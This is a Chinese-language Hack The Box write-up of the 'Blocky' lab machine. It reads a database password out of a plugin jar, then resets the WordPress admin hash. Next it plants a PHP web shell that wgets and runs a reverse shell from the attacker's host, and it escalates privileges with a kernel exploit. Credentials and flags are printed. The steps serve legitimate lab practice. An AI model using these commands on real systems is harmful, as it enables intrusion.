Blocky (Hack The Box Writeup)


  • URL : https://app.hackthebox.eu/machines/48
  • IP : 10.129.1.53

Recon

  • Rustscan
  • Nmap
  • 觀察首頁
    • 看起來是 WordPress
  • 掃目錄
    • https://www.exploit-db.com/exploits/46676
    • phpmyadmin
    • plugins
  • PHPmyadmin
    • Version 4.5.4.1
    • 有 Exploit
      • https://www.exploit-db.com/exploits/40185
        • 要帳密
  • 繼續觀察
    • 他有一個 Wiki
    • 其實剛剛 dirsearch 就有看到

WordPress

  • 觀察 WordPress 使用者
    • http://10.129.1.53/index.php/?author=1
    • notch
  • 嘗試登入 /wp-admin
  • 觀察目錄 /plugins
    • plugins
    • 裡面有兩個檔案
    • 感覺 BlockyCore.jar 是它們自己寫的

Reverse

  • 用 r2 觀察
  • 算ㄌ還是不要裝逼,乖乖用 jd-gui 笑死
  • 找到 db 帳密
    • root
    • 8YsqfCTnvxAUeduzjNSXe22

PHP My admin

  • 用帳密登入後找到 WordPress 使用者頁面
    • 備份原本使用者的 hash 以備不時之需
    • $P$BiVoTj899ItS1EZnMhqeqVbrZI4Oq0/
  • 把 hash 修改成 12345 的 md5
    • 827ccb0eea8a706c4c34a16891f84e7b

登入 WordPress

  • 用帳號 notch 密碼 12345 登入
  • 在 plugin 中增加 php web shell
  • 確認 webshell 可用
  • 下載 reverse shell
    • http://10.129.1.53/wp-content/plugins/akismet/akismet.php?A=wget%2010.10.16.35:8000/s_HTB
  • 執行 webshell
    • http://10.129.1.53/wp-content/plugins/akismet/akismet.php?A=bash%20s_HTB

Reverse shell

  • spawn shell
    • python3 -c 'import pty; pty.spawn("/bin/bash")'

提權

  • 跑 Linpeas
    • 發現可以 Kernel Exploit
    • https://github.com/rlarabee/exploits/tree/master/cve-2017-16995
  • 編譯並丟過去
    • https://raw.githubusercontent.com/rlarabee/exploits/master/cve-2017-16995/cve-2017-16995.c
  • 取得 Flag
    • User
      • 59fee0977fb60b8a0bc6e41e751f3cd5
    • Root
      • 0a9694a5b4d272c694679f7860f1cd5f
  • 看了一下正規解
    • 貌似可以直接用 SQL 密碼 SSH 登入
    • 然後 sudo su 就結束ㄌ
    • ㄏㄏ
,

發表迴響